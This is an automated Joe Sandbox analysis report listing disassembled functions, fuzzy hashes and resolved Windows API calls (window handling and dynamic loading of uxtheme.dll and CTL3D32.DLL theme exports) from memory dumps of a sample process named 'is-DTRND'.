Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: Window$Placement$Iconic
String ID:
API String ID: 568898626-0
Opcode ID: dc58d66978c6618ff13ac97b2135afa658c4e4a3005f0a2fe000ae6168c5a40b
Instruction ID: 30cacb2419379e21ad62ac75053296c38e5df2c0c88bcfe5efa0be9826c6abaa
Opcode Fuzzy Hash: dc58d66978c6618ff13ac97b2135afa658c4e4a3005f0a2fe000ae6168c5a40b
Instruction Fuzzy Hash: 00012131204108A7CB10EE69DCC1EE777ACAF44324F65456AFD19DF246DA35DC9087A9

Uniqueness

Uniqueness Score: -1.00%

Function 00417660 Relevance: 3.0, APIs: 2, Instructions: 44windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 0041768B
GetCapture.USER32 ref: 00417694

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: CaptureIconic
String ID:
API String ID: 2277910766-0
Opcode ID: 71f45d83057601ef7c9972d8b124dc0c79a2ac31caeb3e9c2b7b1a9b94684ccc
Instruction ID: e2c853b8e7d03f8f643d1a4b758c0cccdc63e7ffcba8e606f1134375ce5c50b7
Opcode Fuzzy Hash: 71f45d83057601ef7c9972d8b124dc0c79a2ac31caeb3e9c2b7b1a9b94684ccc
Instruction Fuzzy Hash: 1DF03131304E1147D7209B2EC885AA776F49F44368B14443FE415CB7A1EB6DDCC58758

Uniqueness

Uniqueness Score: -1.00%

Function 0042425C Relevance: 3.0, APIs: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 00424263

Part of subcall function 00423B4C: EnumWindows.USER32(00423AE4), ref: 00423B70
Part of subcall function 00423B4C: GetWindow.USER32(?,00000003), ref: 00423B85
Part of subcall function 00423B4C: GetWindowLongA.USER32 ref: 00423B94
Part of subcall function 00423B4C: SetWindowPos.USER32(00000000,$BB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,00424273,?,?,00423E3B), ref: 00423BCA

SetActiveWindow.USER32(?,?,?,00423E3B,00000000,00424224), ref: 00424277

Part of subcall function 00423714: ShowWindow.USER32(00410718,00000009,?,00000000,0041EE6C,00423A02,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000), ref: 0042372F

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: Window$ActiveEnumIconicLongShowWindows
String ID:
API String ID: 2671590913-0
Opcode ID: aaaddde6ee2b305b5243f3db384bc4cc68d29bade52947bdfcd5501e18dbe071
Instruction ID: c189c6313aa840117835aae4f110270c77ee590bde57f011389e38c63b543ebb
Opcode Fuzzy Hash: aaaddde6ee2b305b5243f3db384bc4cc68d29bade52947bdfcd5501e18dbe071
Instruction Fuzzy Hash: 12E01AA130022087DB00AFAAD8C4B9672A9BB88305F5541BABD08DF28BD63CDC008738

Uniqueness

Uniqueness Score: -1.00%

Function 004126A0 Relevance: 1.7, APIs: 1, Instructions: 188nativeCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,0041289D), ref: 0041288B

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: NtdllProc_Window
String ID:
API String ID: 4255912815-0
Opcode ID: e3fcff2c66ec7f6e757c4ae7fef65e8f873ebdf0c45899a4688c3efbbcf21d8a
Instruction ID: 36b9d0047ee0a29776eabb05bf093a7c0386881185b34e0cb4d9ddd626c11e39
Opcode Fuzzy Hash: e3fcff2c66ec7f6e757c4ae7fef65e8f873ebdf0c45899a4688c3efbbcf21d8a
Instruction Fuzzy Hash: 1651F5316046058BD714EF6AD681A9BF3E1FF94314B2086BBD814D3761E7B8ED92CB48

Uniqueness

Uniqueness Score: -1.00%

Function 10001130 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.376235403.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.376198453.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.376251639.0000000010002000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_is-DTRND.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
Instruction ID: 1c94840b05858ddf3503627acbaac9226f9c4a6e1659969bf0a936c2f155f8a0
Opcode Fuzzy Hash: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
Instruction Fuzzy Hash: FF11303254D3D28FC305CF2894506D6FFE4AF6A640F194AAEE1D45B203C2659549C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 10001000 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.376235403.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.376198453.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.376251639.0000000010002000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_is-DTRND.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
Instruction ID: 837d35c9df4effc004866add7a9100bdfed479f04b3922bb4bd4c5469ecd81ba
Opcode Fuzzy Hash: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0044B310 Relevance: 166.5, APIs: 48, Strings: 47, Instructions: 252libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 0044B2BC: GetVersionExA.KERNEL32(00000094), ref: 0044B2D9

LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F419,0048B7A2), ref: 0044B337
6CAD5550.KERNEL32(00000000,OpenThemeData,uxtheme.dll,?,0044F419,0048B7A2), ref: 0044B34F
6CAD5550.KERNEL32(00000000,CloseThemeData,00000000,OpenThemeData,uxtheme.dll,?,0044F419,0048B7A2), ref: 0044B361
6CAD5550.KERNEL32(00000000,DrawThemeBackground,00000000,CloseThemeData,00000000,OpenThemeData,uxtheme.dll,?,0044F419,0048B7A2), ref: 0044B373
6CAD5550.KERNEL32(00000000,DrawThemeText,00000000,DrawThemeBackground,00000000,CloseThemeData,00000000,OpenThemeData,uxtheme.dll,?,0044F419,0048B7A2), ref: 0044B385
6CAD5550.KERNEL32(00000000,GetThemeBackgroundContentRect,00000000,DrawThemeText,00000000,DrawThemeBackground,00000000,CloseThemeData,00000000,OpenThemeData,uxtheme.dll,?,0044F419,0048B7A2), ref: 0044B397
6CAD5550.KERNEL32(00000000,GetThemeBackgroundContentRect,00000000,GetThemeBackgroundContentRect,00000000,DrawThemeText,00000000,DrawThemeBackground,00000000,CloseThemeData,00000000,OpenThemeData,uxtheme.dll,?,0044F419,0048B7A2), ref: 0044B3A9
6CAD5550.KERNEL32(00000000,GetThemePartSize,00000000,GetThemeBackgroundContentRect,00000000,GetThemeBackgroundContentRect,00000000,DrawThemeText,00000000,DrawThemeBackground,00000000,CloseThemeData,00000000,OpenThemeData,uxtheme.dll), ref: 0044B3BB
6CAD5550.KERNEL32(00000000,GetThemeTextExtent,00000000,GetThemePartSize,00000000,GetThemeBackgroundContentRect,00000000,GetThemeBackgroundContentRect,00000000,DrawThemeText,00000000,DrawThemeBackground,00000000,CloseThemeData,00000000,OpenThemeData), ref: 0044B3CD
6CAD5550.KERNEL32(00000000,GetThemeTextMetrics,00000000,GetThemeTextExtent,00000000,GetThemePartSize,00000000,GetThemeBackgroundContentRect,00000000,GetThemeBackgroundContentRect,00000000,DrawThemeText,00000000,DrawThemeBackground,00000000,CloseThemeData), ref: 0044B3DF
6CAD5550.KERNEL32(00000000,GetThemeBackgroundRegion,00000000,GetThemeTextMetrics,00000000,GetThemeTextExtent,00000000,GetThemePartSize,00000000,GetThemeBackgroundContentRect,00000000,GetThemeBackgroundContentRect,00000000,DrawThemeText,00000000,DrawThemeBackground), ref: 0044B3F1
6CAD5550.KERNEL32(00000000,HitTestThemeBackground,00000000,GetThemeBackgroundRegion,00000000,GetThemeTextMetrics,00000000,GetThemeTextExtent,00000000,GetThemePartSize,00000000,GetThemeBackgroundContentRect,00000000,GetThemeBackgroundContentRect,00000000,DrawThemeText), ref: 0044B403
6CAD5550.KERNEL32(00000000,DrawThemeEdge,00000000,HitTestThemeBackground,00000000,GetThemeBackgroundRegion,00000000,GetThemeTextMetrics,00000000,GetThemeTextExtent,00000000,GetThemePartSize,00000000,GetThemeBackgroundContentRect,00000000,GetThemeBackgroundContentRect), ref: 0044B415
6CAD5550.KERNEL32(00000000,DrawThemeIcon,00000000,DrawThemeEdge,00000000,HitTestThemeBackground,00000000,GetThemeBackgroundRegion,00000000,GetThemeTextMetrics,00000000,GetThemeTextExtent,00000000,GetThemePartSize,00000000,GetThemeBackgroundContentRect), ref: 0044B427
6CAD5550.KERNEL32(00000000,IsThemePartDefined,00000000,DrawThemeIcon,00000000,DrawThemeEdge,00000000,HitTestThemeBackground,00000000,GetThemeBackgroundRegion,00000000,GetThemeTextMetrics,00000000,GetThemeTextExtent,00000000,GetThemePartSize), ref: 0044B439
6CAD5550.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent,00000000,IsThemePartDefined,00000000,DrawThemeIcon,00000000,DrawThemeEdge,00000000,HitTestThemeBackground,00000000,GetThemeBackgroundRegion,00000000,GetThemeTextMetrics,00000000,GetThemeTextExtent), ref: 0044B44B
6CAD5550.KERNEL32(00000000,GetThemeColor,00000000,IsThemeBackgroundPartiallyTransparent,00000000,IsThemePartDefined,00000000,DrawThemeIcon,00000000,DrawThemeEdge,00000000,HitTestThemeBackground,00000000,GetThemeBackgroundRegion,00000000,GetThemeTextMetrics), ref: 0044B45D
6CAD5550.KERNEL32(00000000,GetThemeMetric,00000000,GetThemeColor,00000000,IsThemeBackgroundPartiallyTransparent,00000000,IsThemePartDefined,00000000,DrawThemeIcon,00000000,DrawThemeEdge,00000000,HitTestThemeBackground,00000000,GetThemeBackgroundRegion), ref: 0044B46F
6CAD5550.KERNEL32(00000000,GetThemeString,00000000,GetThemeMetric,00000000,GetThemeColor,00000000,IsThemeBackgroundPartiallyTransparent,00000000,IsThemePartDefined,00000000,DrawThemeIcon,00000000,DrawThemeEdge,00000000,HitTestThemeBackground), ref: 0044B481
6CAD5550.KERNEL32(00000000,GetThemeBool,00000000,GetThemeString,00000000,GetThemeMetric,00000000,GetThemeColor,00000000,IsThemeBackgroundPartiallyTransparent,00000000,IsThemePartDefined,00000000,DrawThemeIcon,00000000,DrawThemeEdge), ref: 0044B493
6CAD5550.KERNEL32(00000000,GetThemeInt,00000000,GetThemeBool,00000000,GetThemeString,00000000,GetThemeMetric,00000000,GetThemeColor,00000000,IsThemeBackgroundPartiallyTransparent,00000000,IsThemePartDefined,00000000,DrawThemeIcon), ref: 0044B4A5
6CAD5550.KERNEL32(00000000,GetThemeEnumValue,00000000,GetThemeInt,00000000,GetThemeBool,00000000,GetThemeString,00000000,GetThemeMetric,00000000,GetThemeColor,00000000,IsThemeBackgroundPartiallyTransparent,00000000,IsThemePartDefined), ref: 0044B4B7
6CAD5550.KERNEL32(00000000,GetThemePosition,00000000,GetThemeEnumValue,00000000,GetThemeInt,00000000,GetThemeBool,00000000,GetThemeString,00000000,GetThemeMetric,00000000,GetThemeColor,00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B4C9
6CAD5550.KERNEL32(00000000,GetThemeFont,00000000,GetThemePosition,00000000,GetThemeEnumValue,00000000,GetThemeInt,00000000,GetThemeBool,00000000,GetThemeString,00000000,GetThemeMetric,00000000,GetThemeColor), ref: 0044B4DB
6CAD5550.KERNEL32(00000000,GetThemeRect,00000000,GetThemeFont,00000000,GetThemePosition,00000000,GetThemeEnumValue,00000000,GetThemeInt,00000000,GetThemeBool,00000000,GetThemeString,00000000,GetThemeMetric), ref: 0044B4ED
6CAD5550.KERNEL32(00000000,GetThemeMargins,00000000,GetThemeRect,00000000,GetThemeFont,00000000,GetThemePosition,00000000,GetThemeEnumValue,00000000,GetThemeInt,00000000,GetThemeBool,00000000,GetThemeString), ref: 0044B4FF
6CAD5550.KERNEL32(00000000,GetThemeIntList,00000000,GetThemeMargins,00000000,GetThemeRect,00000000,GetThemeFont,00000000,GetThemePosition,00000000,GetThemeEnumValue,00000000,GetThemeInt,00000000,GetThemeBool), ref: 0044B511
6CAD5550.KERNEL32(00000000,GetThemePropertyOrigin,00000000,GetThemeIntList,00000000,GetThemeMargins,00000000,GetThemeRect,00000000,GetThemeFont,00000000,GetThemePosition,00000000,GetThemeEnumValue,00000000,GetThemeInt), ref: 0044B523
6CAD5550.KERNEL32(00000000,SetWindowTheme,00000000,GetThemePropertyOrigin,00000000,GetThemeIntList,00000000,GetThemeMargins,00000000,GetThemeRect,00000000,GetThemeFont,00000000,GetThemePosition,00000000,GetThemeEnumValue), ref: 0044B535
6CAD5550.KERNEL32(00000000,GetThemeFilename,00000000,SetWindowTheme,00000000,GetThemePropertyOrigin,00000000,GetThemeIntList,00000000,GetThemeMargins,00000000,GetThemeRect,00000000,GetThemeFont,00000000,GetThemePosition), ref: 0044B547
6CAD5550.KERNEL32(00000000,GetThemeSysColor,00000000,GetThemeFilename,00000000,SetWindowTheme,00000000,GetThemePropertyOrigin,00000000,GetThemeIntList,00000000,GetThemeMargins,00000000,GetThemeRect,00000000,GetThemeFont), ref: 0044B559
6CAD5550.KERNEL32(00000000,GetThemeSysColorBrush,00000000,GetThemeSysColor,00000000,GetThemeFilename,00000000,SetWindowTheme,00000000,GetThemePropertyOrigin,00000000,GetThemeIntList,00000000,GetThemeMargins,00000000,GetThemeRect), ref: 0044B56B
6CAD5550.KERNEL32(00000000,GetThemeSysBool,00000000,GetThemeSysColorBrush,00000000,GetThemeSysColor,00000000,GetThemeFilename,00000000,SetWindowTheme,00000000,GetThemePropertyOrigin,00000000,GetThemeIntList,00000000,GetThemeMargins), ref: 0044B57D
6CAD5550.KERNEL32(00000000,GetThemeSysSize,00000000,GetThemeSysBool,00000000,GetThemeSysColorBrush,00000000,GetThemeSysColor,00000000,GetThemeFilename,00000000,SetWindowTheme,00000000,GetThemePropertyOrigin,00000000,GetThemeIntList), ref: 0044B58F
6CAD5550.KERNEL32(00000000,GetThemeSysFont,00000000,GetThemeSysSize,00000000,GetThemeSysBool,00000000,GetThemeSysColorBrush,00000000,GetThemeSysColor,00000000,GetThemeFilename,00000000,SetWindowTheme,00000000,GetThemePropertyOrigin), ref: 0044B5A1
6CAD5550.KERNEL32(00000000,GetThemeSysString,00000000,GetThemeSysFont,00000000,GetThemeSysSize,00000000,GetThemeSysBool,00000000,GetThemeSysColorBrush,00000000,GetThemeSysColor,00000000,GetThemeFilename,00000000,SetWindowTheme), ref: 0044B5B3
6CAD5550.KERNEL32(00000000,GetThemeSysInt,00000000,GetThemeSysString,00000000,GetThemeSysFont,00000000,GetThemeSysSize,00000000,GetThemeSysBool,00000000,GetThemeSysColorBrush,00000000,GetThemeSysColor,00000000,GetThemeFilename), ref: 0044B5C5
6CAD5550.KERNEL32(00000000,IsThemeActive,00000000,GetThemeSysInt,00000000,GetThemeSysString,00000000,GetThemeSysFont,00000000,GetThemeSysSize,00000000,GetThemeSysBool,00000000,GetThemeSysColorBrush,00000000,GetThemeSysColor), ref: 0044B5D7
6CAD5550.KERNEL32(00000000,IsAppThemed,00000000,IsThemeActive,00000000,GetThemeSysInt,00000000,GetThemeSysString,00000000,GetThemeSysFont,00000000,GetThemeSysSize,00000000,GetThemeSysBool,00000000,GetThemeSysColorBrush), ref: 0044B5E9
6CAD5550.KERNEL32(00000000,GetWindowTheme,00000000,IsAppThemed,00000000,IsThemeActive,00000000,GetThemeSysInt,00000000,GetThemeSysString,00000000,GetThemeSysFont,00000000,GetThemeSysSize,00000000,GetThemeSysBool), ref: 0044B5FB
6CAD5550.KERNEL32(00000000,EnableThemeDialogTexture,00000000,GetWindowTheme,00000000,IsAppThemed,00000000,IsThemeActive,00000000,GetThemeSysInt,00000000,GetThemeSysString,00000000,GetThemeSysFont,00000000,GetThemeSysSize), ref: 0044B60D
6CAD5550.KERNEL32(00000000,IsThemeDialogTextureEnabled,00000000,EnableThemeDialogTexture,00000000,GetWindowTheme,00000000,IsAppThemed,00000000,IsThemeActive,00000000,GetThemeSysInt,00000000,GetThemeSysString,00000000,GetThemeSysFont), ref: 0044B61F
6CAD5550.KERNEL32(00000000,GetThemeAppProperties,00000000,IsThemeDialogTextureEnabled,00000000,EnableThemeDialogTexture,00000000,GetWindowTheme,00000000,IsAppThemed,00000000,IsThemeActive,00000000,GetThemeSysInt,00000000,GetThemeSysString), ref: 0044B631
6CAD5550.KERNEL32(00000000,SetThemeAppProperties,00000000,GetThemeAppProperties,00000000,IsThemeDialogTextureEnabled,00000000,EnableThemeDialogTexture,00000000,GetWindowTheme,00000000,IsAppThemed,00000000,IsThemeActive,00000000,GetThemeSysInt), ref: 0044B643
6CAD5550.KERNEL32(00000000,GetCurrentThemeName,00000000,SetThemeAppProperties,00000000,GetThemeAppProperties,00000000,IsThemeDialogTextureEnabled,00000000,EnableThemeDialogTexture,00000000,GetWindowTheme,00000000,IsAppThemed,00000000,IsThemeActive), ref: 0044B655
6CAD5550.KERNEL32(00000000,GetThemeDocumentationProperty,00000000,GetCurrentThemeName,00000000,SetThemeAppProperties,00000000,GetThemeAppProperties,00000000,IsThemeDialogTextureEnabled,00000000,EnableThemeDialogTexture,00000000,GetWindowTheme,00000000,IsAppThemed), ref: 0044B667
6CAD5550.KERNEL32(00000000,DrawThemeParentBackground,00000000,GetThemeDocumentationProperty,00000000,GetCurrentThemeName,00000000,SetThemeAppProperties,00000000,GetThemeAppProperties,00000000,IsThemeDialogTextureEnabled,00000000,EnableThemeDialogTexture,00000000,GetWindowTheme), ref: 0044B679
6CAD5550.KERNEL32(00000000,EnableTheming,00000000,DrawThemeParentBackground,00000000,GetThemeDocumentationProperty,00000000,GetCurrentThemeName,00000000,SetThemeAppProperties,00000000,GetThemeAppProperties,00000000,IsThemeDialogTextureEnabled,00000000,EnableThemeDialogTexture), ref: 0044B68B

Strings

IsThemeActive, xrefs: 0044B5CF
GetWindowTheme, xrefs: 0044B5F3
GetThemeAppProperties, xrefs: 0044B629
HitTestThemeBackground, xrefs: 0044B3FB
GetThemeMetric, xrefs: 0044B467
GetThemeInt, xrefs: 0044B49D
GetThemeTextMetrics, xrefs: 0044B3D7
GetThemeString, xrefs: 0044B479
IsThemeBackgroundPartiallyTransparent, xrefs: 0044B443
DrawThemeBackground, xrefs: 0044B36B
GetThemeBackgroundContentRect, xrefs: 0044B38F, 0044B3A1
EnableTheming, xrefs: 0044B683
GetThemeMargins, xrefs: 0044B4F7
GetThemeFilename, xrefs: 0044B53F
GetThemeColor, xrefs: 0044B455
GetThemeSysColor, xrefs: 0044B551
GetThemeSysColorBrush, xrefs: 0044B563
GetThemeIntList, xrefs: 0044B509
IsAppThemed, xrefs: 0044B5E1
DrawThemeParentBackground, xrefs: 0044B671
IsThemePartDefined, xrefs: 0044B431
DrawThemeEdge, xrefs: 0044B40D
GetThemeDocumentationProperty, xrefs: 0044B65F
GetCurrentThemeName, xrefs: 0044B64D
GetThemeEnumValue, xrefs: 0044B4AF
GetThemeSysSize, xrefs: 0044B587
uxtheme.dll, xrefs: 0044B332
GetThemeFont, xrefs: 0044B4D3
GetThemeSysBool, xrefs: 0044B575
DrawThemeText, xrefs: 0044B37D
GetThemeRect, xrefs: 0044B4E5
CloseThemeData, xrefs: 0044B359
SetThemeAppProperties, xrefs: 0044B63B
GetThemeSysInt, xrefs: 0044B5BD
OpenThemeData, xrefs: 0044B347
GetThemePartSize, xrefs: 0044B3B3
DrawThemeIcon, xrefs: 0044B41F
GetThemeBool, xrefs: 0044B48B
GetThemeTextExtent, xrefs: 0044B3C5
GetThemeSysFont, xrefs: 0044B599
GetThemePropertyOrigin, xrefs: 0044B51B
EnableThemeDialogTexture, xrefs: 0044B605
GetThemeSysString, xrefs: 0044B5AB
IsThemeDialogTextureEnabled, xrefs: 0044B617
GetThemeBackgroundRegion, xrefs: 0044B3E9
SetWindowTheme, xrefs: 0044B52D
GetThemePosition, xrefs: 0044B4C1

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: D5550$LibraryLoadVersion
String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
API String ID: 2731847445-2910565190
Opcode ID: 098f4700c2907fc1554ba32b0b08b5dba202583cdd5cf764a44ad359fd220b82
Instruction ID: 242e7e21fa825da25f81ac783cc841e04e5882cfc85cca0ddc461d149a585560
Opcode Fuzzy Hash: 098f4700c2907fc1554ba32b0b08b5dba202583cdd5cf764a44ad359fd220b82
Instruction Fuzzy Hash: 9691F6B0E41B25ABEB00AFB598D6E2E37A8EB057147500E7AB404EF295D778D8008F5D

Uniqueness

Uniqueness Score: -1.00%

Function 0041F1E0 Relevance: 45.6, APIs: 15, Strings: 11, Instructions: 87libraryCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(?,004190B8,00000000,?,?,00000001,00000000), ref: 0041F1EE
SetErrorMode.KERNEL32(00008000,?,004190B8,00000000,?,?,00000001,00000000), ref: 0041F20A
LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,004190B8,00000000,?,?,00000001,00000000), ref: 0041F216
SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,004190B8,00000000,?,?,00000001,00000000), ref: 0041F224
6CAD5550.KERNEL32(00000001,Ctl3dRegister,?,004190B8,00000000,?,?,00000001,00000000), ref: 0041F254
6CAD5550.KERNEL32(00000001,Ctl3dUnregister,?,004190B8,00000000,?,?,00000001,00000000), ref: 0041F27D
6CAD5550.KERNEL32(00000001,Ctl3dSubclassCtl,00000001,Ctl3dUnregister,?,004190B8,00000000,?,?,00000001,00000000), ref: 0041F292
6CAD5550.KERNEL32(00000001,Ctl3dSubclassDlgEx,00000001,Ctl3dSubclassCtl,00000001,Ctl3dUnregister,?,004190B8,00000000,?,?,00000001,00000000), ref: 0041F2A7
6CAD5550.KERNEL32(00000001,Ctl3dDlgFramePaint,00000001,Ctl3dSubclassDlgEx,00000001,Ctl3dSubclassCtl,00000001,Ctl3dUnregister,?,004190B8,00000000,?,?,00000001,00000000), ref: 0041F2BC
6CAD5550.KERNEL32(00000001,Ctl3dCtlColorEx,00000001,Ctl3dDlgFramePaint,00000001,Ctl3dSubclassDlgEx,00000001,Ctl3dSubclassCtl,00000001,Ctl3dUnregister,?,004190B8,00000000,?,?,00000001), ref: 0041F2D1
6CAD5550.KERNEL32(00000001,Ctl3dAutoSubclass,00000001,Ctl3dCtlColorEx,00000001,Ctl3dDlgFramePaint,00000001,Ctl3dSubclassDlgEx,00000001,Ctl3dSubclassCtl,00000001,Ctl3dUnregister,?,004190B8,00000000), ref: 0041F2E6
6CAD5550.KERNEL32(00000001,Ctl3dUnAutoSubclass,00000001,Ctl3dAutoSubclass,00000001,Ctl3dCtlColorEx,00000001,Ctl3dDlgFramePaint,00000001,Ctl3dSubclassDlgEx,00000001,Ctl3dSubclassCtl,00000001,Ctl3dUnregister,?,004190B8), ref: 0041F2FB
6CAD5550.KERNEL32(00000001,Ctl3DColorChange,00000001,Ctl3dUnAutoSubclass,00000001,Ctl3dAutoSubclass,00000001,Ctl3dCtlColorEx,00000001,Ctl3dDlgFramePaint,00000001,Ctl3dSubclassDlgEx,00000001,Ctl3dSubclassCtl,00000001,Ctl3dUnregister), ref: 0041F310
6CAD5550.KERNEL32(00000001,BtnWndProc3d,00000001,Ctl3DColorChange,00000001,Ctl3dUnAutoSubclass,00000001,Ctl3dAutoSubclass,00000001,Ctl3dCtlColorEx,00000001,Ctl3dDlgFramePaint,00000001,Ctl3dSubclassDlgEx,00000001,Ctl3dSubclassCtl), ref: 0041F325
FreeLibrary.KERNEL32(00000001,?,004190B8,00000000,?,?,00000001,00000000), ref: 0041F337

Strings

Ctl3dAutoSubclass, xrefs: 0041F2DB
Ctl3DColorChange, xrefs: 0041F305
Ctl3dRegister, xrefs: 0041F249
Ctl3dSubclassCtl, xrefs: 0041F287
Ctl3dUnregister, xrefs: 0041F272
Ctl3dUnAutoSubclass, xrefs: 0041F2F0
BtnWndProc3d, xrefs: 0041F31A
Ctl3dDlgFramePaint, xrefs: 0041F2B1
Ctl3dSubclassDlgEx, xrefs: 0041F29C
Ctl3dCtlColorEx, xrefs: 0041F2C6
CTL3D32.DLL, xrefs: 0041F211

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: D5550$ErrorLibraryMode$FreeLoadVersion
String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
API String ID: 4101126754-3614243559
Opcode ID: 75314b2eaa4bf69177d09f864bb6ec6c8c78ec8614df53f68c0acf1a6219d738
